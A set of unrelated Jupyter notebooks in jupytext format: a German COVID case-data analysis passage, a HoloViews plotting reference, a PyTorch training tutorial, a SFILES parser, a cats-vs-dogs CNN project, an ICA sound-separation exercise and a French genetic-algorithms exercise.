Axis. Have look at https://stackoverflow.com/questions/14711655/how-to-prevent-numbers-being-changed-to-exponential-form-in-python-matplotlib-fi ax.get_yaxis().get_major_formatter().set_scientific(False) save_fig("attribute_bar_plots") plt.show() # Dem Diagramm ist zu entnehmen, dass es mehr Genese bzw. insgesamt mehr an Corona erkrankte Menschen weiblichen Geschlechts gibt. Es liegt die Vermutung nahe, dass dies an der allgemein höheren Lebenserwartung von Frauen liegt, weshalb in höhen Altersgruppen auch mehr Frauen vertreten sind (bpb - Bundeszentrale für politische Bildung 2018). # # ### Balkendiagram Altersgruppe # Nachfolgend soll ein Balkendiagramm der aktuellen Coronazahlen, nach dem Fallstatus je Bundesland erstellt werden. Dies soll Auskunft über die Verteilung der Fälle nach Bundesland geben. # Vorbereiten des DataFrames durch Gruppieren des Bundeslands und Anwendung der Pivot-Funktion auf das Attribut Fallstatus dfAltersgruppeGrouped = df.groupBy("Altersgruppe").pivot("FallStatus").count().orderBy("GENESEN","GESTORBEN", "NICHTEINGETRETEN", ascending=False) dfAltersgruppePandas = dfAltersgruppeGrouped.toPandas() dfAltersgruppeGrouped.show() # Erstellen des Balkendiagramms ax = dfAltersgruppePandas.plot.bar(x='Altersgruppe', ylabel="Anzahl Fälle",width=0.5, title="Fallzahlen nach Status je Altersgruppe", figsize=(15,10), rot=90, stacked=True) # Don't want scaled Axis. Have look at https://stackoverflow.com/questions/14711655/how-to-prevent-numbers-being-changed-to-exponential-form-in-python-matplotlib-fi ax.get_yaxis().get_major_formatter().set_scientific(False) save_fig("attribute_bar_plots") plt.show() # ### Verstorben nach Altersgruppe und Geschlecht # Vorbereiten des DataFrames durch Gruppieren des Bundeslands und Anwendung der Pivot-Funktion auf das Attribut Fallstatus dfVerstorbenGrouped = df.filter(df.FallStatus == "GESTORBEN").groupBy("Altersgruppe").pivot("Geschlecht").count().orderBy("W","M", ascending=True) dfVerstorbenPandas = dfVerstorbenGrouped.toPandas() dfVerstorbenGrouped.show() # Erstellen des Balkendiagramms ax = dfVerstorbenPandas.plot.bar(x='Altersgruppe', ylabel="Anzahl Verstorbene",width=0.5, title="Verstorbene nach Alter und Geschlecht", figsize=(15,10), rot=90) # Don't want scaled Axis. Have look at https://stackoverflow.com/questions/14711655/how-to-prevent-numbers-being-changed-to-exponential-form-in-python-matplotlib-fi ax.get_yaxis().get_major_formatter().set_scientific(False) save_fig("attribute_bar_plots") plt.show() # ## Korrelationsanalyse # + # Aufbau des Feature-Vectors assembler = VectorAssembler(outputCol="features", inputCols=["FallStatusIndex", "GeschlechtIndex","AltersgruppeIndex", "BundeslandIndex", "LandkreisIndex"]) featureVector = assembler.transform(df) def prettyPrintDenseMatrix(dm, collArray) : rows = dm.toArray().tolist() dfDM = spark.createDataFrame(rows,collArray) newDf = dfDM.toPandas() from IPython.display import display, HTML return HTML(newDf.to_html()) # - # Die nachfolgenden Korrelationsanalysen weisen auf, dass die Features 'Alter' und 'Fallstatus' im Vergleich zu den anderen Merkmalen (außgenommen Landkreis und Bundesland) den größten Zusammenhang besitzen, auch wenn die Korrelation nicht sehr ausgeprägt (signifikant) ist. Jedoch kann mit Blick auf die anderen Auswertungen, gesagt werden, dass ca. 20.63% aller Über 80 Jährigen die an Corona erkranken auch sterben. Bei den Erkrankten zwischen 60 und 79 sind es 4,9%. Zu diesen beiden Altersgruppen lassen sich ca. 95.7% aller Verstorbenen zuordnen. # ### Korrelationsanalyse nach Pearson corPearson = Correlation.corr(featureVector, "features").head() print("Pearson correlation matrix:\n") prettyPrintDenseMatrix(corPearson[0], ["FallStatus", "Geschlecht", "Altersgruppe", "Bundesland", "Landkreis"]) # ### Korrelationsanalyse nach Spearman corSpearmen = Correlation.corr(featureVector, "features", "spearman").head() print("Spearman correlation matrix:\n") prettyPrintDenseMatrix(corSpearmen[0], ["FallStatus", "Geschlecht", "Altersgruppe", "Bundesland", "Landkreis"]) # ## Hypothesenüberprüfung # Aufbau des Feature-Vectors assembler = VectorAssembler(outputCol="features", inputCols=["GeschlechtIndex","AltersgruppeIndex","BundeslandIndex"]) featureVector = assembler.transform(df) # ### Chi Quadrad-Test # Bezüglich der Interpreation der Ergebniswerte, sei auf die hießigen Statistischen Werke verwiesen. ciSquare = ChiSquareTest.test(featureVector, "features", "FallStatusIndex") ciSquare.show(truncate=False) # ## Histogramm # ### Fallzahlen über den Zeitverlauf dfHist = df.select("Falldatum") dfHistPandas = dfHist.toPandas() dfHistPandas['Falldatum'] = pd.to_datetime(dfHistPandas['Falldatum']) hist = dfHistPandas.hist(bins=100, figsize=(15,10))
03_Data_Understanding_B.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # --- # <div class="contentcontainer med left" style="margin-left: -50px;"> # <dl class="dl-horizontal"> # <dt>Title</dt> <dd> BoxWhisker Element</dd> # <dt>Dependencies</dt> <dd>Bokeh</dd> # <dt>Backends</dt> <dd><a href='./BoxWhisker.ipynb'>Bokeh</a></dd> <dd><a href='../matplotlib/BoxWhisker.ipynb'>Matplotlib</a></dd> # </dl> # </div> import numpy as np import holoviews as hv from holoviews import opts hv.extension('bokeh') # A ``BoxWhisker`` Element is a quick way of visually summarizing one or more groups of numerical data through their quartiles. The boxes of a ``BoxWhisker`` element represent the first, second and third quartiles. The whiskers follow the Tukey boxplot definition representing the lowest datum still within 1.5 IQR of the lower quartile, and the highest datum still within 1.5 IQR of the upper quartile. Any points falling outside this range are shown as distinct outlier points. # # The data of a ``BoxWhisker`` Element may have any number of key dimensions representing the grouping of the value dimension and a single value dimensions representing the distribution of values within each group. See the [Tabular Datasets](../../../user_guide/08-Tabular_Datasets.ipynb) user guide for supported data formats, which include arrays, pandas dataframes and dictionaries of arrays. # Without any groups a BoxWhisker Element represents a single distribution of values: hv.BoxWhisker(np.random.randn(1000), vdims='Value') # By supplying key dimensions we can compare our distributions across multiple variables. groups = [chr(65+g) for g in np.random.randint(0, 3, 200)] boxwhisker = hv.BoxWhisker((groups, np.random.randint(0, 5, 200), np.random.randn(200)), ['Group', 'Category'], 'Value').sort() boxwhisker.opts( opts.BoxWhisker(box_color='white', height=400, show_legend=False, whisker_color='gray', width=600)) # For full documentation and the available style and plot options, use ``hv.help(hv.BoxWhisker).``
examples/reference/elements/bokeh/BoxWhisker.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # %matplotlib inline # # `Learn the Basics <intro.html>`_ || # `Quickstart <quickstart_tutorial.html>`_ || # `Tensors <tensorqs_tutorial.html>`_ || # `Datasets & DataLoaders <data_tutorial.html>`_ || # `Transforms <transforms_tutorial.html>`_ || # `Build Model <buildmodel_tutorial.html>`_ || # `Autograd <autogradqs_tutorial.html>`_ || # **Optimization** || # `Save & Load Model <saveloadrun_tutorial.html>`_ # # Optimizing Model Parameters # =========================== # # Now that we have a model and data it's time to train, validate and test our model by optimizing its parameters on # our data. Training a model is an iterative process; in each iteration (called an *epoch*) the model makes a guess about the output, calculates # the error in its guess (*loss*), collects the derivatives of the error with respect to its parameters (as we saw in # the `previous section <autograd_tutorial.html>`_), and **optimizes** these parameters using gradient descent. For a more # detailed walkthrough of this process, check out this video on `backpropagation from 3Blue1Brown <https://www.youtube.com/watch?v=tIeHLnjs5U8>`__. # # Prerequisite Code # ----------------- # We load the code from the previous sections on `Datasets & DataLoaders <data_tutorial.html>`_ # and `Build Model <buildmodel_tutorial.html>`_. # # # + import torch from torch import nn from torch.utils.data import DataLoader from torchvision import datasets from torchvision.transforms import ToTensor, Lambda training_data = datasets.FashionMNIST( root="data", train=True, download=True, transform=ToTensor() ) test_data = datasets.FashionMNIST( root="data", train=False, download=True, transform=ToTensor() ) train_dataloader = DataLoader(training_data, batch_size=64) test_dataloader = DataLoader(test_data, batch_size=64) class NeuralNetwork(nn.Module): def __init__(self): super(NeuralNetwork, self).__init__() self.flatten = nn.Flatten() self.linear_relu_stack = nn.Sequential( nn.Linear(28*28, 512), nn.ReLU(), nn.Linear(512, 512), nn.ReLU(), nn.Linear(512, 10), nn.ReLU() ) def forward(self, x): x = self.flatten(x) logits = self.linear_relu_stack(x) return logits model = NeuralNetwork() # - # Hyperparameters # ----------------- # # Hyperparameters are adjustable parameters that let you control the model optimization process. # Different hyperparameter values can impact model training and convergence rates # (`read more <https://pytorch.org/tutorials/beginner/hyperparameter_tuning_tutorial.html>`__ about hyperparameter tuning) # # We define the following hyperparameters for training: # - **Number of Epochs** - the number times to iterate over the dataset # - **Batch Size** - the number of data samples seen by the model in each epoch # - **Learning Rate** - how much to update models parameters at each batch/epoch. Smaller values yield slow learning speed, while large values may result in unpredictable behavior during training. # # # learning_rate = 1e-3 batch_size = 64 epochs = 5 # Optimization Loop # ----------------- # # Once we set our hyperparameters, we can then train and optimize our model with an optimization loop. Each # iteration of the optimization loop is called an **epoch**. # # Each epoch consists of two main parts: # - **The Train Loop** - iterate over the training dataset and try to converge to optimal parameters. # - **The Validation/Test Loop** - iterate over the test dataset to check if model performance is improving. # # Let's briefly familiarize ourselves with some of the concepts used in the training loop. Jump ahead to # see the `full-impl-label` of the optimization loop. # # Loss Function # ~~~~~~~~~~~~~~~~~ # # When presented with some training data, our untrained network is likely not to give the correct # answer. **Loss function** measures the degree of dissimilarity of obtained result to the target value, # and it is the loss function that we want to minimize during training. To calculate the loss we make a # prediction using the inputs of our given data sample and compare it against the true data label value. # # Common loss functions include `nn.MSELoss <https://pytorch.org/docs/stable/generated/torch.nn.MSELoss.html#torch.nn.MSELoss>`_ (Mean Square Error) for regression tasks, and # `nn.NLLLoss <https://pytorch.org/docs/stable/generated/torch.nn.NLLLoss.html#torch.nn.NLLLoss>`_ (Negative Log Likelihood) for classification. # `nn.CrossEntropyLoss <https://pytorch.org/docs/stable/generated/torch.nn.CrossEntropyLoss.html#torch.nn.CrossEntropyLoss>`_ combines ``nn.LogSoftmax`` and ``nn.NLLLoss``. # # We pass our model's output logits to ``nn.CrossEntropyLoss``, which will normalize the logits and compute the prediction error. # # # Initialize the loss function loss_fn = nn.CrossEntropyLoss() # Optimizer # ~~~~~~~~~~~~~~~~~ # # Optimization is the process of adjusting model parameters to reduce model error in each training step. **Optimization algorithms** define how this process is performed (in this example we use Stochastic Gradient Descent). # All optimization logic is encapsulated in the ``optimizer`` object. Here, we use the SGD optimizer; additionally, there are many `different optimizers <https://pytorch.org/docs/stable/optim.html>`_ # available in PyTorch such as ADAM and RMSProp, that work better for different kinds of models and data. # # We initialize the optimizer by registering the model's parameters that need to be trained, and passing in the learning rate hyperparameter. # # optimizer = torch.optim.SGD(model.parameters(), lr=learning_rate) # Inside the training loop, optimization happens in three steps: # * Call ``optimizer.zero_grad()`` to reset the gradients of model parameters. Gradients by default add up; to prevent double-counting, we explicitly zero them at each iteration. # * Backpropagate the prediction loss with a call to ``loss.backwards()``. PyTorch deposits the gradients of the loss w.r.t. each parameter. # * Once we have our gradients, we call ``optimizer.step()`` to adjust the parameters by the gradients collected in the backward pass. # # # # Full Implementation # ----------------------- # We define ``train_loop`` that loops over our optimization code, and ``test_loop`` that # evaluates the model's performance against our test data. # # # + def train_loop(dataloader, model, loss_fn, optimizer): size = len(dataloader.dataset) for batch, (X, y) in enumerate(dataloader): # Compute prediction and loss pred = model(X) loss = loss_fn(pred, y) # Backpropagation optimizer.zero_grad() loss.backward() optimizer.step() if batch % 100 == 0: loss, current = loss.item(), batch * len(X) print(f"loss: {loss:>7f} [{current:>5d}/{size:>5d}]") def test_loop(dataloader, model, loss_fn): size = len(dataloader.dataset) test_loss, correct = 0, 0 with torch.no_grad(): for X, y in dataloader: pred = model(X) test_loss += loss_fn(pred, y).item() correct += (pred.argmax(1) == y).type(torch.float).sum().item() test_loss /= size correct /= size print(f"Test Error: \n Accuracy: {(100*correct):>0.1f}%, Avg loss: {test_loss:>8f} \n") # - # We initialize the loss function and optimizer, and pass it to ``train_loop`` and ``test_loop``. # Feel free to increase the number of epochs to track the model's improving performance. # # # + loss_fn = nn.CrossEntropyLoss() optimizer = torch.optim.SGD(model.parameters(), lr=learning_rate) epochs = 10 for t in range(epochs): print(f"Epoch {t+1}\n-------------------------------") train_loop(train_dataloader, model, loss_fn, optimizer) test_loop(test_dataloader, model, loss_fn) print("Done!") # - # Further Reading # ----------------------- # - `Loss Functions <https://pytorch.org/docs/stable/nn.html#loss-functions>`_ # - `torch.optim <https://pytorch.org/docs/stable/optim.html>`_ # - `Warmstart Training a Model <https://pytorch.org/tutorials/recipes/recipes/warmstarting_model_using_parameters_from_a_different_model.html>`_ # # #
jupyter/PyTorch tutorials/optimization_tutorial.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + [markdown] colab_type="text" id="Do6-5IxXl7lE" # # SFILES Directed Graph # # This notebook demonstrates the compilation of SFILES descriptors to a directed graph. # + [markdown] colab_type="text" id="jx1vt_ANagX_" # ## Parsing Rules # # The next cell develops a representation of the SFILES grammar using the `pyparsing` library. In this case, the `unit` match is not restricted to a specific list of unit operations. Instead, `unit` is any sequence of lower case alphabetic characters. # + colab={} colab_type="code" id="JGpySfEcSaxs" from pyparsing import Literal, Word, Group, Suppress from pyparsing import Optional, OneOrMore, ZeroOrMore, oneOf, nestedExpr from pyparsing import alphas, nums LPAR = Suppress("(") RPAR = Suppress(")") LBRA = Suppress("[") RBRA = Suppress("]") SLASH = Suppress("/") GT = Literal(">") LT = Literal("<") # components component = Word(alphas.upper(), exact=1) # mixtures mixture = Group(OneOrMore(component)) # first unit and stream in a process group unit = Optional(Word(alphas.lower()), default='dist') stream = Group(unit + mixture) # subsequent units and streams in a process group unit_ = Optional(Word(alphas.lower()), default='s') stream_ = Group(unit_ + mixture) # process group processgroup = Group(LPAR + stream + ZeroOrMore(SLASH + stream_) + RPAR) # a process group sequence is comprised of connectors, process group, and recycles connector = Optional(GT | LT, default=GT) recycle = Word(nums, exact=1) sequence = Group(processgroup + ZeroOrMore(connector + (processgroup | recycle ))) # nested branches branchsequence = OneOrMore(connector + (processgroup | recycle )) branch = nestedExpr(opener=LBRA, closer=RBRA, content=branchsequence) # sfiles expression start with sequence sfiles = sequence + ZeroOrMore(branch | sequence) # example results = sfiles.parseString('(iA)(rAB/pABCD)<1<2[<(iB)](mABC/D)[<(oD)](A/BC)1(cycB/C)2(oC)') results.asList() # + graph = {} components = set() units = set() lastProcessgroup = [''] lastConnector = '' recycleA = {} recycleB = {} def componentAction(t): components.add(t[0]) return t component.setParseAction(componentAction) def mixtureAction(t): return ''.join(t[0]) mixture.setParseAction(mixtureAction) def unitAction(t): units.add(t[0]) return t unit.setParseAction(unitAction) def streamAction(t): return ''.join(t[0]) stream.setParseAction(streamAction) stream_.setParseAction(streamAction) def processgroupAction(t): global lastConnector pg = '(' + '/'.join(t[0]) + ')' graph[pg] = set() print(pg, lastProcessgroup) if lastProcessgroup[-1] and ('>' in lastConnector): graph[lastProcessgroup[-1]].add(pg) elif lastProcessgroup[-1] and ('>' in lastConnector): graph[pg].add(lastProcessgroup[-1]) lastProcessgroup[-1] = pg return pg processgroup.setParseAction(processgroupAction) def connectorAction(t): global lastConnector lastConnector = str(t[0]) return t connector.setParseAction(connectorAction) def recycleAction(t): global lastProcessgroup, lastConnector if '<' in lastConnector: if t[0] in recycleA.keys(): src = recycleA[t[0]] dst = lastProcessgroup[-1] graph[src].add(dst) else: recycleB[t[0]] = lastProcessgroup[-1] else: if t[0] in recycleB.keys(): src = lastProcessgroup[-1] dst = recycleB[t[0]] graph[src].add(dst) else: recycleA[t[0]] = lastProcessgroup[-1] def sequenceAction(t): global lastProcessgroup lastProcessgroup.append(t[0][-1]) return t sequence.setParseAction(sequenceAction) branchsequence.setParseAction(sequenceAction) def branchAction(t): global lastProcessgroup lastProcessgroup.pop(-1) lastProcessgroup.pop(-1) return t branch.setParseAction(branchAction) results = sfiles.parseString('(iA)(rAB/pABCD)<1<2[<(iB)](mABC/D)[<(oD)](A/BC)1(cycB/C)2(oC)') print('Components:', components) print('Units:', units) print() for u, s in graph.items(): fmt = '{0:>12s}:' print(fmt.format(u), s) # -
notebooks/05_SFILES_Directed_Graph.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # name: python3 # --- # + [markdown] id="view-in-github" colab_type="text" # <a href="https://colab.research.google.com/github/ruoroj/Catsn-Dogs/blob/main/CandD.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a> # + id="kuxm58tewDKu" pip install --upgrade jupyter_http_over_ws>=0.0.7 && \ jupyter serverextension enable --py jupyter_http_over_ws # + [markdown] id="fx6ICuz7OVca" # # 1. Defining the Question # + [markdown] id="yIEM3JyuOqny" # ### Understanding the Context # + [markdown] id="yayBVuEFO6aO" # The database is composed of several hundred images of cats and Dogs. Using these images we will train a amchine learning model to predict the difference between cats and dogs. # + [markdown] id="8lR1IYJWPD91" # ### Specifying the Question # + [markdown] id="Cf7rnqX2PF7E" # This dataset was first introduced to users in a Kaggle competition in 2013, whose goal was to write an algorithm to classify whether images contain either a dog or a cat. Since then, users have used the dataset for image recognition practice. # # + [markdown] id="nyrdtMHtPKWO" # ### Metrics for Success # + [markdown] id="XjGSWdwOPPW2" # The metric of success for this project is the model accuracy. The model accuracy shows how well a particular model predicts the dependent variable when tested after training it. The accuracy will be derived using the accuracy score. An accuracy that is low shows our model fails to accurately predict the dependent variable and the data may be underfit while an accuracy of 1 is not good either since the model is overfitted. In this project, my aim is to achieve an accuracy of at least 80%. # + [markdown] id="VxD8GEyIPUMQ" # ### The Experimental Design # + [markdown] id="17prGPGCPZSq" # The experimental design for this project is as follows: # # - Loading the libraries and dataset # - Data cleaning and preparation # - Performing EDA # - Making predictions using the different models that I've created # - Assesing the accuracy of the models created # - Making conclusions # + [markdown] id="yhy40BQ4Pqcs" # # 2. Reading the Data # + colab={"base_uri": "https://localhost:8080/"} id="p2J-51H3Ncne" outputId="8204fd28-015d-4f90-cab3-9804fb0473a2" # Importing the libraries import pandas as pd pd.options.display.float_format = "{:.2f}".format import numpy as np import os import matplotlib.pyplot as plt import matplotlib.image as mpimg import seaborn as sns from sklearn.model_selection import train_test_split from sklearn.metrics import r2_score from sklearn import metrics from sklearn.metrics import confusion_matrix,accuracy_score, classification_report from sklearn.preprocessing import StandardScaler import scipy as sp import tensorflow as tf import warnings import cv2 warnings.filterwarnings('ignore') from sklearn.preprocessing import LabelEncoder lb=LabelEncoder() from google.colab import drive drive.mount('/content/drive') from zipfile import ZipFile as zf import shutil import random from matplotlib import pyplot as plt # + id="HlCI3tLGOVGj" # Extracting data from G-Drive test_zip = zf('/content/drive/MyDrive/tempdf_storage/cand/test1.zip', 'r') test_zip.extractall('./tmp') test_zip.close() train_zip = zf('/content/drive/MyDrive/tempdf_storage/cand/train.zip', 'r') train_zip.extractall('./tmp') train_zip.close() # + [markdown] id="08xz1u1QzSmp" # # Perform EDA # + colab={"base_uri": "https://localhost:8080/", "height": 269} id="NZAU662kqjeW" outputId="506a748c-be31-403f-a0ab-d32133348d3a" # Checking if there is content in the train data train_data = '/content/tmp/train/' x = os.listdir(train_data) for img in os.listdir(train_data): img_array = cv2.imread(os.path.join(train_data, img)) plt.imshow(img_array) plt.show() break # + id="Q_I4kS9h9JpB" # Making a directory to store cata and dog pictures separately. images = './tmp/train' pet_images = './pet-images' cats = os.path.join(pet_images,'cat') dogs = os.path.join(pet_images,'dog') os.mkdir(pet_images) os.mkdir(cats) os.mkdir(dogs) # + id="Tjs6EoVqsm-2" # Spliting the cats and dog images into different folders for i in os.listdir(images): if i.split('.')[0] == 'cat': src = os.path.join(images,i) dst = os.path.join(cats,i) shutil.copyfile(src,dst) elif i.split('.')[0] == 'dog': src = os.path.join(images,i) dst = os.path.join(dogs,i) shutil.copyfile(src,dst) # + colab={"base_uri": "https://localhost:8080/", "height": 317} id="xcBoKtPl9o5p" outputId="c5627242-2236-4ff2-d06d-45ab92e5937e" # Check the number of images in each folder y = print(len(os.listdir(cats))) x = print(len(os.listdir(dogs))) sns.countplot(os.listdir(train)) # + [markdown] id="F0bBKLtFJUYl" # # Model Preprocessing. # + id="ZIMqrJWNsm7g" # Spliting the images into training and validation sets base_dir = './dogs-vs-cats' os.mkdir(base_dir) train = os.path.join(base_dir,'training') validation = os.path.join(base_dir,'validation') train_cat = os.path.join(train,'cats') train_dog = os.path.join(train,'dogs') validation_cat = os.path.join(validation,'cats') validation_dog = os.path.join(validation,'dogs') # + id="MXc07QGJsm5J" # Defining the test folder and populating it with data test_images = './tmp/test1' test = os.path.join(base_dir,'test') test_folder = os.path.join(test,'test_folder') os.mkdir(test) os.mkdir(test_folder) for i in os.listdir(test_images): src = os.path.join(test_images,i) dst = os.path.join(test_folder,i) shutil.copyfile(src,dst) # + colab={"base_uri": "https://localhost:8080/"} id="rifLCsyOsm2d" outputId="89f385d9-a712-4ce7-b65c-e1c9cbff0a26" # Check the length of the test folder print(len(os.listdir(test_folder))) # + id="oCcD0nFOypPb" # Making the directories of the train, and validation datasets. os.mkdir(train) os.mkdir(validation) os.mkdir(train_cat) os.mkdir(train_dog) os.mkdir(validation_cat) os.mkdir(validation_dog) # + id="d9MxXanYOU6v" # Defining Function of spliting the dataset into def split_data(source,training,validation,split): data = os.listdir(source) data = random.sample(data,len(data)) for id,file in enumerate(data): if (os.path.getsize(source) != 0) and (id < len(data) * split): src = os.path.join(source,file) dst = os.path.join(training,file) shutil.copyfile(src,dst) elif (os.path.getsize(source) != 0) and (id >= len(data) * split): src = os.path.join(source,file) dst = os.path.join(validation,file) shutil.copyfile(src,dst) split = 0.8 split_data(cats,train_cat,validation_cat,split) split_data(dogs,train_dog,validation_dog,split) # + colab={"base_uri": "https://localhost:8080/"} id="d3EKuVI-4MNU" outputId="a127f875-726b-4e2f-c7a6-aca9e92ea346" # Check the length of the differnet splits print(len(os.listdir(train_cat))) print(len(os.listdir(train_dog))) print(len(os.listdir(validation_cat))) print(len(os.listdir(validation_dog))) # + [markdown] id="Q2rgnTM2Aodd" # ## Tensorflow Modelling # + id="JzrryVQiz2uw" # Imorting libraries needed for Tensorflow modelling from keras import models from keras import layers from keras import optimizers from keras.preprocessing.image import load_img, img_to_array, ImageDataGenerator WIDTH = 150 HEIGHT = 150 import tensorflow as tf from tensorflow.keras.datasets import cifar10 from tensorflow.keras.preprocessing.image import ImageDataGenerator from tensorflow.keras.models import Sequential from tensorflow.keras.layers import Dense, Dropout, Activation, Flatten from tensorflow.keras.layers import Conv2D, MaxPooling2D # + colab={"base_uri": "https://localhost:8080/"} id="4p9_ZY7B0YDR" outputId="5613fb5b-d551-4df1-b333-f229d0cc8736" # Defining the convolution layers model=models.Sequential() model.add(layers.Conv2D(32, (3,3), activation="relu", input_shape=(WIDTH, HEIGHT, 3))) model.add(layers.Conv2D(32, (3,3), activation="relu")) model.add(layers.MaxPooling2D((2,2))) model.add(layers.Conv2D(128, (3,3), activation="relu")) model.add(layers.Conv2D(128, (3,3), activation="relu")) model.add(layers.MaxPooling2D((2,2))) model.add(layers.Conv2D(64, (3,3), activation="relu")) model.add(layers.Conv2D(64, (3,3), activation="relu")) model.add(layers.MaxPooling2D((2,2))) model.add(layers.Flatten()) model.add(layers.Dense(512, activation="relu")) model.add(layers.Dense(1, activation="sigmoid")) model.summary() # + colab={"base_uri": "https://localhost:8080/"} id="_YULTesk1ym_" outputId="885b1b0c-9c06-4e36-919c-648b2f6a9278" # Compiling the model model.compile(loss="binary_crossentropy", optimizer=optimizers.RMSprop(learning_rate=1e-4), metrics=["binary_accuracy"]) print(" Model compiled.") # + id="0C2fL3Nb17Mf" # Generating tensor images datagen = ImageDataGenerator(rescale=1./255, #featurewise_center=True, #featurewise_std_normalization=True, rotation_range=40, width_shift_range=0.2, height_shift_range=0.2, shear_range=0.2, zoom_range=0.2, horizontal_flip=True, vertical_flip=True, fill_mode='nearest' ) valid_datagen = ImageDataGenerator(rescale=1./255) # + colab={"base_uri": "https://localhost:8080/"} id="0bmhNRWd17JR" outputId="48e1f818-f551-4a41-db51-48c2a760e56a" # Defining the model's parameters train_generator = datagen.flow_from_directory('/content/dogs-vs-cats/training', target_size=(150,150), batch_size=64, class_mode='binary' ) validation_generator = valid_datagen.flow_from_directory('/content/dogs-vs-cats/validation', target_size=(150,150), batch_size=64, class_mode='binary' ) # + colab={"base_uri": "https://localhost:8080/"} id="vOJJkCB7Ad_G" outputId="3dfb1e6f-9c69-4fb9-b14c-3283a354ea59" # Running the 20 epochs history = model.fit(train_generator, steps_per_epoch=50, epochs=20, validation_data=validation_generator, validation_steps=20, ) # + [markdown] id="TNxtZWEhBZiw" # The accuracy of the model is about 80.16%. This is good as we have achieved out metric of success. # # # # + [markdown] id="U7X2t_IvIbTY" # # Metrics # + [markdown] id="Klq68wWjIdtU" # Let us visualize the metrics of the model as it performed in the different epochs. # + id="XF0bkNqFAd1Q" colab={"base_uri": "https://localhost:8080/", "height": 562} outputId="57d0a0c6-17e6-40c7-a711-f1a08710f9fe" # Getting the metrics and visualizing their performance for differet epochs acc = history.history['acc'] val_acc = history.history['val_acc'] loss = history.history['loss'] val_loss = history.history['val_loss'] epoch = range(len(acc)) plt.title('Accuracy vs Validation-Accuracy') plt.plot(epoch,acc,label='Accuracy') plt.plot(epoch,val_acc,label='Validation-Accuracy') plt.legend() plt.figure() plt.title('Loss vs Validation-Loss') plt.plot(epoch,loss,label='Loss') plt.plot(epoch,val_loss,label='Validation-Loss') plt.legend() # + [markdown] id="5asi5t_GIqHT" # # Conclusion # + [markdown] id="2envyMYpItoq" # The model has an accuracy score of 80%. Hence, the project can be considered successfull. The metrics for success included performing EDA and getting an accuracy score of above 80%.
CandD.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # ICA on sound tracks # <NAME> (<EMAIL>) 26th April 2018 # # Source: CS229: PS4Q4 # # Starting code: http://cs229.stanford.edu/ps/ps4/q4/ import sounddevice as sd import numpy as np import matplotlib.pyplot as plt # %matplotlib inline Fs = 11025 # + def normalize(dat): return 0.99 * dat / np.max(np.abs(dat)) def load_data(): mix = np.loadtxt('cs229_Data/mix.dat') return mix def play(vec): sd.play(vec, Fs, blocking=True) # - def unmixer(X): M, N = X.shape # W = np.random.rand(N,N) W = np.eye(N) anneal = [0.1, 0.1, 0.1, 0.05, 0.05, 0.05, 0.02, 0.02, 0.01, 0.01, 0.005, 0.005, 0.002, 0.002, 0.001, 0.001] print('Separating tracks ...') sigmoid = lambda x: 1 / (1 + np.exp(-x)) tol = [] ######## Your code here ########## for alpha in anneal: print('working on alpha = {0}'.format(alpha)) for xi in X: p1 = np.outer(1 - 2 * sigmoid(np.dot(W, xi.T)), xi) p2 = np.linalg.inv(W.T) W += alpha * (p1 + p2) # Vectorisation not working :( # gradient = (1 - 2*sigmoid(np.dot(W,X.T))).dot(X)/M + np.linalg.inv(W.T) # W = W + alpha*gradient # tol.append(np.linalg.norm(W_old - W)) # plt.plot(tol) ################################### return W def unmix(X, W): S = np.zeros(X.shape) ######### Your code here ########## S = np.dot(W, X.T) ################################## return S.T # + X = normalize(load_data()) for i in range(X.shape[1]): print('Playing mixed track %d' % i) play(X[:, i]) # - W = unmixer(X) W # + S = normalize(unmix(X, W)) for i in range(S.shape[1]): print('Playing separated track %d' % i) play(S[:, i]) # - # p1 = np.outer(1 - 2 * sigmoid(np.dot(W, xi.T)), xi) sigmoid = lambda x: 1 / (1 + np.exp(-x)) m = 1-2*sigmoid(np.dot(W, xi.T)) m2 = np.dot(m.reshape([-1,1]), xi.reshape([1,-1])) np.shape(xi)
CS229_PS/.ipynb_checkpoints/PS4_Q4_ICA-checkpoint.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Algorithmes génétiques # # Vous souhaitez partir dans l'espace et trouvez un manuel un peu étrange. Ce manuel contient un message en 32 caractères qui n'est plus lisible. Le manuel vous fournit en revanche une fonction Python (!) qui, à partir d'un message passé en paramètre (chaîne de caractère) renvoit le nombre de caractères correctement placés par rapport au message d'origine. from stochastic.data import score score("Hi guys!") # Bon, c'est déjà ça... # La fonction fournie permet de faire des tests avec une autre solution, ce qui va nous permettre de mettre au point un algorithme de résolution. score("plop", solution="ploc") # Nous allons mettre au point un algorithme de résolution de type « algorithmes génétiques » pour résoudre le décodage du message "Hello world!". score_hello = lambda x: score(x, solution="Hello world!") score_hello("Hello world!") # Tout d'abord, considérons l'ensemble des caractères qui forment notre mot. On a le droit: # - aux vingt-six lettres de l'alphabet minuscules; (message en anglais, sans accent!) # - aux mêmes lettres en majuscules; # - à la ponctuation. # + import string letters = string.ascii_uppercase + string.ascii_lowercase + string.punctuation + ' ' letters # - # Puisqu'on travaille avec un problème plus petit, on stocke cette taille: length = score_hello("Hello world!") length # La bibliothèque `random` nous sera utile pour cette séance. Elle propose notamment la fonction `choice`: # + import random random.choice(letters) # - # On peut également tirer plusieurs lettres (différentes) avec la fonction `sample`: random.sample(letters, 3) # Notons également les deux fonctions suivantes pour transformer une chaîne de caractère en liste, et inversement: list("toto") "".join([random.choice(letters) for _ in range(12)]) # Estimons le temps d'évaluation de la fonction `score_hello`: # %%timeit score_hello("Hello,World~") # <div class="alert alert-warning"> # **Question : ** Estimer le temps d'évaluation au pire 